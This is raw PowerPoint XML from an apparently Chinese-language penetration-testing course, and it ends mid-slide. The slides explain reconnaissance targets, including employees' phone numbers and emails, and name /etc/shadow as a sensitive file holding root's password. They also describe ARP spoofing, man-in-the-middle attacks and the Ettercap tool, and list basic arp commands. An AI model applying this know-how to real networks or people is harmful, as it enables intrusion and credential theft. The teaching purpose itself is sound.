        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285073138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四、后门</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id="{4C4ADCFD-A395-4067-9FC7-132C55533E9C}"/>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敏感文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337592" y="2271401"/>
            <a:ext cx="3638940" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>●	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户的密码，只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>权限可查看。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9811C5E3-B5DE-4FCE-8E95-DF79CAD7BAEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="46844"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4751851" y="1587353"/>
            <a:ext cx="6927237" cy="3683293"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375089259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2050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165600"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="972516"/>
            <a:ext cx="7200800" cy="5441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介绍</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信息收集</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后门</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内网渗透</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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社会工程学</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检测</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endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="2409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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368503231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五、内网渗透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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272277" y="901265"/>
            <a:ext cx="3638940" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网络层次</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4636D798-CE6F-4DA4-888F-877BCF7AB8A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1108791" y="2503658"/>
            <a:ext cx="9680603" cy="3703183"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142896221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五、内网渗透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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335191" y="1283820"/>
            <a:ext cx="11521617" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址解析协议，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Address Resolution Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），是根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址获取物理地址的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议。主机发送信息时将包含目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址；收到返回消息后将该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址和物理地址存入本机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>缓存中并保留一定时间，下次请求时直接查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>缓存以节约资源。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>命令可用于查询本机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>缓存中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址的对应关系、添加或删除静态对应关系等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址解析协议是建立在网络中各个主机互相信任的基础上的，网络上的主机可以自主发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应答消息，其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>缓存；由此攻击者就可以向某一主机发送伪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应答报文，使其发送的信息无法到达预期的主机或到达错误的主机，这就构成了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>欺骗。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2390629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5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911425" y="986794"/>
            <a:ext cx="9788659" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在对一个站进行渗透测试的过程中，信息收集是非常重要的。信息收集的详细与否可能决定着此次渗透测试的成功与否。信息收集很基础但是也很有效果，每个渗透测试项目下来，都会去做信息收集，然后才是挖掘漏洞，利用漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息收集的目标：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	域名：子域名、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	端口：开放的端口服务、服务版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	邮箱：邮箱服务器地址、邮箱系统软件版本、相关漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	企业信息：员工信息（手机号码、邮箱、姓名），组织框架、企业法人、企业综合信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>cms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>版本，漏洞历史、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	网站客服：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、邮箱、电话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>●	网站敏感文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信息：备份文件、测试文件、久项目文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3049393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五、内网渗透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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335191" y="1283820"/>
            <a:ext cx="11521617" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中间人攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中间人攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Man-in-the-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>MiddleAttack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，简称“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MITM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击”）是一种“间接”的入侵攻击，这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间，这台计算机就称为“中间人”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ettercap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>EtterCap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址欺骗方式的网络嗅探工具，主要适用于交换局域网络。借助于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>EtterCap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>嗅探软件，管理员可以检测网络内明 文数据通讯的安全性，及时采取措施，避免敏感的用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>密码等数据以明文的方式进行传输。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171060334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五、内网渗透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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335192" y="1283820"/>
            <a:ext cx="5169870" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下打印</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>清空</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -d *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>静态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
